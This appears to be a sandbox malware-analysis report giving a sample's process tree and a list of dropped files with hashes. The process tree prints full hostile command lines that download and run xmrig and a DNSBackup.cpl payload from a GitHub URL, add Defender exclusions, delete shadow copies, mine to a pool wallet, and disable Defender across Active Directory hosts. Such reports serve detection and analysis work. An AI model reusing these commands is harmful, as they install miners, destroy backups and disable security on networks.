                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Invoke-WebRequest -Uri http://raw.githubusercontent.com/SC10001/Di/main/xmrig.exe -Outfile C:\WinXRAR\xmrig.exe
                                                                          5⤵
                                                                          • Blocklisted process makes network request
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Downloads MZ/PE file
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:4596
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:1788
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\WinXRAR\"
                                                                          5⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:5072
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -Command "if (Get-Command Get-ADComputer -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }"
                                                                        4⤵
                                                                        • Hide Artifacts: Ignore Process Interrupts
                                                                        • System Location Discovery: System Language Discovery
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:4320
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /c powershell Invoke-WebRequest -Uri https://www.python.org/ftp/python/3.6.8/python-3.6.8.exe -Outfile C:\WinXRAR\python-3.6.8.exe
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3040
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell Invoke-WebRequest -Uri https://www.python.org/ftp/python/3.6.8/python-3.6.8.exe -Outfile C:\WinXRAR\python-3.6.8.exe
                                                                          5⤵
                                                                          • Blocklisted process makes network request
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Downloads MZ/PE file
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3548
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3304
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Add-WindowsCapability -Online -Name Rsat.ActiveDirectory.DS-LDS.Tools~~~~0.0.1.0"
                                                                          5⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • Drops file in Windows directory
                                                                          • System Location Discovery: System Language Discovery
                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                          PID:3728
                                                                          • C:\Users\Admin\AppData\Local\Temp\CDE580C1-DD68-49F7-91E1-664454B3FDF1\dismhost.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\CDE580C1-DD68-49F7-91E1-664454B3FDF1\dismhost.exe {2012633F-128B-46E0-8FC9-9EE3D8A831FC}
                                                                            6⤵
                                                                            • Executes dropped EXE
                                                                            • Loads dropped DLL
                                                                            • Drops file in Windows directory
                                                                            PID:2256
                                                                      • \??\c:\Windows\system32\wbem\wmic.exe
                                                                        c:\lQBxiF\lQBx\..\..\Windows\lQBx\lQBx\..\..\system32\lQBx\lQBx\..\..\wbem\lQBx\lQBxi\..\..\wmic.exe shadowcopy delete
                                                                        4⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:6380
                                                                      • \??\c:\Windows\system32\wbem\wmic.exe
                                                                        c:\lhtPJo\lhtP\..\..\Windows\lhtP\lhtP\..\..\system32\lhtP\lhtP\..\..\wbem\lhtP\lhtPJ\..\..\wmic.exe shadowcopy delete
                                                                        4⤵
                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                        PID:6940
                                                                      • C:\WinXRAR\xmrig.exe
                                                                        C:\WinXRAR\xmrig.exe -o xmr-us-east1.nanopool.org:14444 -u 47n193Tag3FHULdsD1HYmYGPdfCpquhdci1Rq2L4gR4U5Diq8oX6ny73xRqb4DwWYBTuQQF3Xa36AQFNjCCX71nAMeYiG4t -p x --algo rx/0
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        • Suspicious use of FindShellTrayWindow
                                                                        PID:284
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd.exe /c powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Install-WindowsFeature -Name RSAT-AD-PowerShell"
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:3400
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell.exe -ExecutionPolicy Bypass -NoProfile -Command "Install-WindowsFeature -Name RSAT-AD-PowerShell"
                                                                          5⤵
                                                                          • Command and Scripting Interpreter: PowerShell
                                                                          • System Location Discovery: System Language Discovery
                                                                          PID:2296
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell.exe -Command "if (Get-Command Get-ADComputer -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }"
                                                                        4⤵
                                                                        • Hide Artifacts: Ignore Process Interrupts
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:6876
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -Command " $computers = Get-ADComputer -Filter * | Select-Object -ExpandProperty Name Invoke-Command -ComputerName $computers -ScriptBlock { cmd /c 'start /b powershell -WindowStyle Hidden -Command Set-MpPreference -DisableRealtimeMonitoring $true && start /b if not exist C:\ProgramData\DNSBackup mkdir C:\ProgramData\DNSBackup && powershell -WindowStyle Hidden Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl && start /b C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl & start /b C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl' } "
                                                                        4⤵
                                                                        • Command and Scripting Interpreter: PowerShell
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:2080
                                                                • C:\Windows\system32\cmd.exe
                                                                  C:\Windows\system32\cmd.exe /c "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                  1⤵
                                                                    PID:5816
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window --win-session-start
                                                                      2⤵
                                                                        PID:4152
                                                                    • C:\Windows\system32\vssvc.exe
                                                                      C:\Windows\system32\vssvc.exe
                                                                      1⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:6496

                                                                    Network

                                                                    MITRE ATT&CK Enterprise v15

                                                                    Replay Monitor

                                                                    Loading Replay Monitor...

                                                                    Downloads

                                                                    • C:\ProgramData\DNSBackup\DNSBackup.cpl

                                                                      Filesize

                                                                      2.1MB

                                                                      MD5

                                                                      1591c716c20a2a4fc5c7f65a97bf5008

                                                                      SHA1

                                                                      83bae7c7e5b2c2a61bd4382b9214118f572fca6f

                                                                      SHA256

                                                                      fdaa002eab9dd2fd33922fc9ff8f0f0da773e05d40f5dd42e195ace0276a08b8

                                                                      SHA512

                                                                      0035384c125168059788dcfd77cd9923fe0560c06d77746e669e4f11211f1cfcf7e396015ed653bd3b537ac2019f681c682744055a23b8b2bf3cc3f0bb404cc3

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      6cf293cb4d80be23433eecf74ddb5503

                                                                      SHA1

                                                                      24fe4752df102c2ef492954d6b046cb5512ad408

                                                                      SHA256

                                                                      b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                                                      SHA512

                                                                      0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      28854213fdaa59751b2b4cfe772289cc

                                                                      SHA1

                                                                      fa7058052780f4b856dc2d56b88163ed55deb6ab

                                                                      SHA256

                                                                      7c65fe71d47e0de69a15b95d1ee4b433c07a1d6f00f37dd32aee3666bb84a915

                                                                      SHA512

                                                                      1e2c928242bdef287b1e8afe8c37427cfd3b7a83c37d4e00e45bcbaa38c9b0bf96f869a062c9bc6bb58ecd36e687a69b21d5b07803e6615a9b632922c1c5ace4

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

                                                                      Filesize

                                                                      280B

                                                                      MD5

                                                                      690f9d619434781cadb75580a074a84d

                                                                      SHA1

                                                                      9c952a5597941ab800cae7262842ab6ac0b82ab1

                                                                      SHA256

                                                                      fc2e4954dbe6b72d5b09e1dc6360ea699437a2551355c2950da0b3d3a4779fc1

                                                                      SHA512

                                                                      d6b1da8e7febf926e8b6c316164efbbac22c7c3d9e4933a19fffba3d1667e1993cdeb5064aa53816c0c53f9d2c53e204772de987eb18adbb094a0fb84ae61fa9

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      d943fd179e366d667e09fe4e9d28b259

                                                                      SHA1

                                                                      cf7beee44eddaff2987494ac36c06bd734c53d1a

                                                                      SHA256

                                                                      cc19dc5abfcd76987266bf4f49b271df9d83a9aa2cafbf27ff23b0a2760fcd0c

                                                                      SHA512

                                                                      9ca7471d3f0e888138c7797bdad69164996474dc9db4dfee048be3dff98aff3ac8a76a38e20a36d972bd0eff4a1c60851598266e76c78aad00efba60572455db

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index~RFe5828ff.TMP

                                                                      Filesize

                                                                      3KB

                                                                      MD5

                                                                      ec8d51cba1932d4a8dc160ee38215681

                                                                      SHA1

                                                                      c6329c47ec3fba3fec2dd43d81d5115dddf016d6

                                                                      SHA256

                                                                      67935ec4eed96a75ea882e9944f85324015b8bac5cb385f07ddf998101ccfabb

                                                                      SHA512

                                                                      97a911c247586f2de1876e180e017af3a51233fe89db605806ccf48ef55cbf696ceffcd2d8ae0b8672a69942b3e252e5ddf9de8f537f9f6454a483c56a4a78b4

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\DualEngine\SiteList-Enterprise.json

                                                                      Filesize

                                                                      2B

                                                                      MD5

                                                                      99914b932bd37a50b983c5e7c90ae93b

                                                                      SHA1

                                                                      bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

                                                                      SHA256

                                                                      44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

                                                                      SHA512

                                                                      27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\HubApps

                                                                      Filesize

                                                                      107KB

                                                                      MD5

                                                                      40e2018187b61af5be8caf035fb72882

                                                                      SHA1

                                                                      72a0b7bcb454b6b727bf90da35879b3e9a70621e

                                                                      SHA256

                                                                      b3efd9d75856016510dd0bdb5e22359925cee7f2056b3cde6411c55ae8ae8ee5

                                                                      SHA512

                                                                      a21b8f3f7d646909d6aed605ad5823269f52fda1255aa9bb4d4643e165a7b11935572bf9e0a6a324874f99c20a6f3b6d1e457c7ccd30adcac83c15febc063d12

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State

                                                                      Filesize

                                                                      8KB

                                                                      MD5

                                                                      574549140b4698762b79d490c76af8cb

                                                                      SHA1

                                                                      101758b7092c78b3592510fc94897b57b7201549

                                                                      SHA256

                                                                      7014ef0e3722d0ee4e6312e563ec12caac60a70a03374752b0868eec2d342465

                                                                      SHA512

                                                                      aa4d3ec84bdd55febe3e35ce4f5b07266adeb960081be5f0475850c22a9ae35926785516c6357cb6e07890d3a2309182d47ae0073f56f53d79c1f86430c1adb2

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports

                                                                      Filesize

                                                                      2B

                                                                      MD5

                                                                      d751713988987e9331980363e24189ce

                                                                      SHA1

                                                                      97d170e1550eee4afc0af065b78cda302a97674c

                                                                      SHA256

                                                                      4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

                                                                      SHA512

                                                                      b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries

                                                                      Filesize

                                                                      40B

                                                                      MD5

                                                                      20d4b8fa017a12a108c87f540836e250

                                                                      SHA1

                                                                      1ac617fac131262b6d3ce1f52f5907e31d5f6f00

                                                                      SHA256

                                                                      6028bd681dbf11a0a58dde8a0cd884115c04caa59d080ba51bde1b086ce0079d

                                                                      SHA512

                                                                      507b2b8a8a168ff8f2bdafa5d9d341c44501a5f17d9f63f3d43bd586bc9e8ae33221887869fa86f845b7d067cb7d2a7009efd71dda36e03a40a74fee04b86856

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      17KB

                                                                      MD5

                                                                      6b25de3b536c749d197a60da41e1253a

                                                                      SHA1

                                                                      8386f595297f68fb5243d693eca7037f115d2a73

                                                                      SHA256

                                                                      6abc1bfeb6d35fa1f1342492466a8e1486695968655c13d1014be77c2c799679

                                                                      SHA512

                                                                      d2acc97836b85c80f6786f5bc9e98e814515462e12ed08fa9ba4e8828e4b0ccf40ce856e5504738ed16dc8b069eaa70e6bb7cd62d11c9eed77f34be40191cf06

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      18KB

                                                                      MD5

                                                                      beab37c0de618a7c5a502b84f1adb041

                                                                      SHA1

                                                                      f3fb2d91ed34b43a45fb617161efbeb6d42c695b

                                                                      SHA256

                                                                      aa310e399e3631644d1e40567efc5b98374946dae20950ed51ec91426a735477

                                                                      SHA512

                                                                      b3ecab6556be2797a9e0053c31700b2f7834a1f50860e5cd9c760345f3b7258e156729f978c0cde55719aa695c8b1242b3dd38f15ea9a9b5903f515914fed393

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

                                                                      Filesize

                                                                      18KB

                                                                      MD5

                                                                      d2b5682504314ea0387d3149aa73bd94

                                                                      SHA1

                                                                      e6669fb6160ea7107ecec4aeba2245efad5e4b2c

                                                                      SHA256

                                                                      ee5242ba2ae40d211597d37afb64542218c64fb995feef657d9c303f77f5660e

                                                                      SHA512

                                                                      c20c5d649eaa7ced63e9560ed2a312e2b3ee12008280dbdb951077568aca62e83d2ed300eb9c65feb8a5c8ccae11f6db413a0972103d77d06797d409fcd7e3bb

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

                                                                      Filesize

                                                                      36KB

                                                                      MD5

                                                                      dfea90944707fe26445215c035f07ef0

                                                                      SHA1

                                                                      a97560d31343e7b7ad7426156f97034f0103da6f

                                                                      SHA256

                                                                      b22f6513c8347999f7406fdfa37e49eb0f7b9c5ffe0aada9fba6572e74204ddf

                                                                      SHA512

                                                                      769762f9ceefbf3a49e85e424ff6fcd538aab454ae90b075f4d2e87fbfced244d546e9235d05b9c29cdf34905b350c274c2c2c555c5f2e9b74d0a9282aef56f8

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

                                                                      Filesize

                                                                      72B

                                                                      MD5

                                                                      ed7eea3c6332ae2fd3d9791c2081b095

                                                                      SHA1

                                                                      52203c17af9c5ff466e52fd8dbd7052bcdd930e7

                                                                      SHA256

                                                                      6790a4d7b5a2ff8de59bb4d47b6cb9bcdfd1c58910cc17614420fc482adbb130

                                                                      SHA512

                                                                      997ddea5f9858c9107a7a77ce45011955cb4eadb7e5b7f285635ee61882fba690276da6a92b76aef3910da5f1f5c896879d34fc893423e22ef020b51f2270732

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe580d2a.TMP

                                                                      Filesize

                                                                      48B

                                                                      MD5

                                                                      c7047fc42b660f5e10f8e8a06b24efc3

                                                                      SHA1

                                                                      a5fc2cad3e4dec7e145c939341066a5c0cecdda2

                                                                      SHA256

                                                                      c3243c1e3fae3285ab614898ad2dfa2e7bccb593b460dfc58e07a819a966d285

                                                                      SHA512

                                                                      2b9da37684a58d5b1775b6cded383717cbe31492d787648d696cccdd0c03b6bbecfe4d65a916c512e7afbb4edbc2a5aaa9564c2ed62871df0d8285aac9299ec4

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Sync Data\Logs\sync_diagnostic.log

                                                                      Filesize

                                                                      22KB

                                                                      MD5

                                                                      0d93544f17a462dff469413cfbdc0d20

                                                                      SHA1

                                                                      8a26c4b86eae13e207e69b79b18f4e19fba39e9a

                                                                      SHA256

                                                                      209847efa4d3d2c21b179c97dc49fd0d36eb5cdb1499e545ace156e7c9d4a65e

                                                                      SHA512

                                                                      53509e1263a6db6f4c693589e3e5e193a8fb95e00fdc6addf133259f703f803ec4982a9cbe24eb2fa80f8a869106bc52d0c51f62c4145f109fb77d4e09ce7076

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                      Filesize

                                                                      469B

                                                                      MD5

                                                                      0dbf207669b51b979b1c2a37a4f567fb

                                                                      SHA1

                                                                      d1e4a64b0cf62368842615469019cbb2993ba4e8

                                                                      SHA256

                                                                      be9aa5ac99165fab3d6168e12744fccdf5dde12df884b879c9213272300b9b3c

                                                                      SHA512

                                                                      6577732fc2663d251f812d33b9c7166ed25060b83f4e2d74a0404e66da9bef603de54fad83df587e61b80bbd1870a6eecb1d1ae1c86b750bf0fee8b5c1d4e0ab

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                      Filesize

                                                                      904B

                                                                      MD5

                                                                      2b7966638a4f2d22f9d1f9d2ef308684

                                                                      SHA1

                                                                      05937ab9258473589bf18d2e21fef5f0b4647abf

                                                                      SHA256

                                                                      b93c5e492f866cd058e6c6ddc666035c5e038d2e5cd7564c886e952016684dbd

                                                                      SHA512

                                                                      ccb65847710c0ea92733066dfcd8450ad1eddc5de34b68d7aa5fa1fc9df9bee27b2a8925a0ce2f8d4f0bb801152a22853b42e2e9b159bf0a15040a5f92b4d0fb

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\CloudConfigLog

                                                                      Filesize

                                                                      23KB

                                                                      MD5

                                                                      da69f756f84962e75b17464ce979932e

                                                                      SHA1

                                                                      4c7563acbbc5c4ab9621999fd18430aa15a88216

                                                                      SHA256

                                                                      2202c118761e0b01c92f15c62ef1ae6ff9d353a828b8bf5d75b7fb6b279e972d

                                                                      SHA512

                                                                      aad49b7792a5b17d9af6720db1796b078fd36e233a6a5a84c1868561351295657874c9cf931ecf7aed2e9845dc08c4a6573f5736a795c488e3b6f7c973a208d4

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Edge Cloud Config\OperationConfig

                                                                      Filesize

                                                                      19KB

                                                                      MD5

                                                                      41c1930548d8b99ff1dbb64ba7fecb3d

                                                                      SHA1

                                                                      d8acfeaf7c74e2b289be37687f886f50c01d4f2f

                                                                      SHA256

                                                                      16cee17a989167242dd7ee2755721e357dd23bcfcb61f5789cc19deafe7ca502

                                                                      SHA512

                                                                      a684d61324c71ac15f3a907788ab2150f61e7e2b2bf13ca08c14e9822b22336d0d45d9ff2a2a145aa7321d28d6b71408f9515131f8a1bd9f4927b105e6471b75

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                      Filesize

                                                                      49KB

                                                                      MD5

                                                                      7b135c9b88e72e1d3aa73ca73c454c08

                                                                      SHA1

                                                                      dffe224e574811593bfa238393543c30168c905c

                                                                      SHA256

                                                                      22205ba24ef59cf82f44c8c64eb3a0e319ee1f26470bc4976756e2043c794283

                                                                      SHA512

                                                                      7ddb82801830a178cbd27bb98a7a67f9480387d48dc3452eabf05204bde7636701b2a5d362eed805ec6e05f83d83bafdcc374d0bd373b1e9a682e30d7a100912

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                      Filesize

                                                                      40KB

                                                                      MD5

                                                                      f21d71755efcce18e95a24066ccea490

                                                                      SHA1

                                                                      29a7b23d26afe253374606de9a18829ebc5ea92c

                                                                      SHA256

                                                                      18ba2f240bc89724df47424764ed9965697d94734c9fe8a86e787a720185a364

                                                                      SHA512

                                                                      19fe33fa212c861028375660a7e18fb1f9488765ad96da14918053a70686cfd891e604f4f1b5d148a2e3b3fda33d6c813ad5d78cd6f572e1be2f8ec15a78b806

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

                                                                      Filesize

                                                                      40KB

                                                                      MD5

                                                                      090fb386460232f1ac548e38a9902667

                                                                      SHA1

                                                                      48f5fd68198f26bc6c85b533e6abf19e46d365d6

                                                                      SHA256

                                                                      a79c8a11a83221df4d6c265b43a51c74b434812df2c57eb0d7ad1b20325162a0

                                                                      SHA512

                                                                      22de4608c062a37afff24e298a81ae1d2af29880c3640eac559ca6853c570766e48245b8db863b7e5ef423d39a39f2e18e77ec447b204c8fe95b966ab9f6bffa

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\extensions_crx_cache\ghbmnnjooekpmoecnnnilnnbdlolhkhi_1.fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                      Filesize

                                                                      152KB

                                                                      MD5

                                                                      dd9bf8448d3ddcfd067967f01e8bf6d7

                                                                      SHA1

                                                                      d7829475b2bd6a3baa8fabfaf39af57c6439b35e

                                                                      SHA256

                                                                      fa2232917a5656ea4f811936561ea6b7c92b3c0004c5e08ecb97636d3afc6f72

                                                                      SHA512

                                                                      65347df34378c2bbb34417e2cccfb3251a0b2412422cc190eed9df525b6e0a9948e0295ea3c33b3ad873ce81e369e89a138ac41d6eb7229546c3269107e661de

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                      Filesize

                                                                      2KB

                                                                      MD5

                                                                      386eb2543eb6e2e18b8749ebc33a9587

                                                                      SHA1

                                                                      3582924a410dd519499339a5909c64d5fd0f8f59

                                                                      SHA256

                                                                      00aa9bf552c7385c31a271b5e5792320d76147e9311f8f9aaa3a0f3b62d849ad

                                                                      SHA512

                                                                      7935939edc378a97d987bb8ba8023e630f9659bd476ee18483e0cc02691e249928faa998844d1da3435a24d724b2a17d42a3cfff0fedd15e9a9366bb4e3b2e56

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      64B

                                                                      MD5

                                                                      ee58c047f9149a9f9daa6e51839f465e

                                                                      SHA1

                                                                      7a396b267453273852995bac52bdc8984596933b

                                                                      SHA256

                                                                      5fc9eebeb4ffbe82f6364fa3d724f9d11adec46c10460f1b16b75b7411a30e6b

                                                                      SHA512

                                                                      a16ab87ba5dae8c08ca28e256ab7145930e9a6ed10c9fb02d49875ec074410f64a187384dbfd51fe322b371102feb5d2157e7fa279cea148f1201e23273dd46d

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      1KB

                                                                      MD5

                                                                      1dffbab5ecc6d06e8b259ad505a0dc2a

                                                                      SHA1

                                                                      0938ec61e4af55d7ee9d12708fdc55c72ccb090c

                                                                      SHA256

                                                                      a9d2e6d35c5e9b94326042c6f2fe7ef381f25a0c02b8a559fc1ee888ccffb18e

                                                                      SHA512

                                                                      93209a16400574416f6f992c2d403acc399179fc911818c4967c9a0211924486878578d1c98ba3bc9e269012603c96ab118a291bf53c57d8af9ab48f9e7b9b76

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      10KB

                                                                      MD5

                                                                      766513f155db34b627ce498b07dc6bed

                                                                      SHA1

                                                                      06c24fcc43bf2b0cb6549de7e9bb37123afb3045

                                                                      SHA256

                                                                      0604dab7ce0959fbcdeda733ff01ce710ac9511f53eaf7f61b98b5faedcc94a3

                                                                      SHA512

                                                                      c178c2e8f0521a65b0fe1289bbf16237345ffc642335c9b1c46746afc5fc5d5b0c955d99f60ee8725c06f6cea51ea1d06fd9cc99883b76c6e2eb014490a91026

                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                      Filesize

                                                                      16KB

                                                                      MD5

                                                                      f573062c533cac94c209017e78af12b8

                                                                      SHA1

                                                                      0e38cd479b3b00ca64bdd60ac693f48f585c25e3

                                                                      SHA256

                                                                      7cc5a8354bde7a6f50f8f2f6b4d13dbc6ec73e74d0d89c93ba78925a8d432050

                                                                      SHA512

                                                                      05038703d158a2f019ae257e9e0815aa0b112b27d3c6ff294aa77760e59527ce35991b8716c1b4cfcb4298ecf0316cb172407046e441231a03956a71de6e2410

                                                                    • C:\Users\Admin\AppData\Local\Temp\66bd76ae-0e12-4386-a435-68l16fa753b.tmp

                                                                      Filesize

                                                                      1B

                                                                      MD5

                                                                      eccbc87e4b5ce2fe28308fd9f2a7baf3

                                                                      SHA1

                                                                      77de68daecd823babbb58edb1c8e14d7106e83bb

                                                                      SHA256

                                                                      4e07408562bedb8b60ce05c1decfe3ad16b72230967de01f640b7e4729b49fce

                                                                      SHA512

                                                                      3bafbf08882a2d10133093a1b8433f50563b93c14acd05b79028eb1d12799027241450980651994501423a66c276ae26c43b739bc65c4e16b10c3af6c202aebb

                                                                    • C:\Users\Admin\AppData\Local\Temp\66bd76ae-0e12-4386-a435-68l16fa753b.tmp

                                                                      Filesize

                                                                      1B

                                                                      MD5

                                                                      a87ff679a2f3e71d9181a67b7542122c

                                                                      SHA1

                                                                      1b6453892473a467d07372d45eb05abc2031647a

                                                                      SHA256

                                                                      4b227777d4dd1fc61c6f884f48641d02b4d121d3fd328cb08b5531fcacdabf8a

                                                                      SHA512

                                                                      a321d8b405e3ef2604959847b36d171eebebc4a8941dc70a4784935a4fca5d5813de84dfa049f06549aa61b20848c1633ce81b675286ea8fb53db240d831c568

                                                                    • C:\Users\Admin\AppData\Local\Temp\CDE580C1-DD68-49F7-91E1-664454B3FDF1\AppxProvider.dll

                                                                      Filesize

                                                                      554KB

                                                                      MD5

                                                                      a7927846f2bd5e6ab6159fbe762990b1

                                                                      SHA1

                                                                      8e3b40c0783cc88765bbc02ccc781960e4592f3f

                                                                      SHA256

                                                                      913f97dd219eeb7d5f7534361037fe1ecc3a637eb48d67b1c8afa8b5f951ba2f

                                                                      SHA512

                                                                      1eafece2f6aa881193e6374b81d7a7c8555346756ed53b11ca1678f1f3ffb70ae3dea0a30c5a0aab8be45db9c31d78f30f026bb22a7519a0930483d50507243f

                                                                    • C:\Users\Admin\AppData\Local\Temp\CDE580C1-DD68-49F7-91E1-664454B3FDF1\AssocProvider.dll

                                                                      Filesize

                                                                      112KB

                                                                      MD5

                                                                      94dc379aa020d365ea5a32c4fab7f6a3

                                                                      SHA1

                                                                      7270573fd7df3f3c996a772f85915e5982ad30a1

                                                                      SHA256

                                                                      dc6a5930c2b9a11204d2e22a3e8d14c28e5bdac548548e256ba7ffa79bd8c907

                                                                      SHA512

                                                                      998fd10a1f43024a2398491e3764748c0b990b37d8b3c820d281296f8da8f1a2f97073f4fd83543994a6e326fa7e299cb5f59e609358cd77af996175782eeaca

                                                                    • C:\Users\Admin\AppData\Local\Temp\CDE580C1-DD68-49F7-91E1-664454B3FDF1\CbsProvider.dll

                                                                      Filesize

                                                                      875KB

                                                                      MD5

                                                                      6ad0376a375e747e66f29fb7877da7d0

                                                                      SHA1

                                                                      a0de5966453ff2c899f00f165bbff50214b5ea39

                                                                      SHA256

                                                                      4c9a4ab6596626482dd2190034fcb3fafebe88a961423962ad577e873ef5008f

                                                                      SHA512

                                                                      8a97b2cc96ec975188e53e428d0fc2c562f4c3493d3c354e316c7f89a0bd25c84246807c9977f0afdda3291b8c23d518a36fd967d8f9d4d2ce7b0af11b96eb18

